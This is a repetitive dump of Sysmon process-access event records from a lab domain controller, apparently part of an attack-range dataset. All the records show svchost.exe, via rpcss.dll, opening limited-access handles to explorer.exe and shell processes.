16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:13.749{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 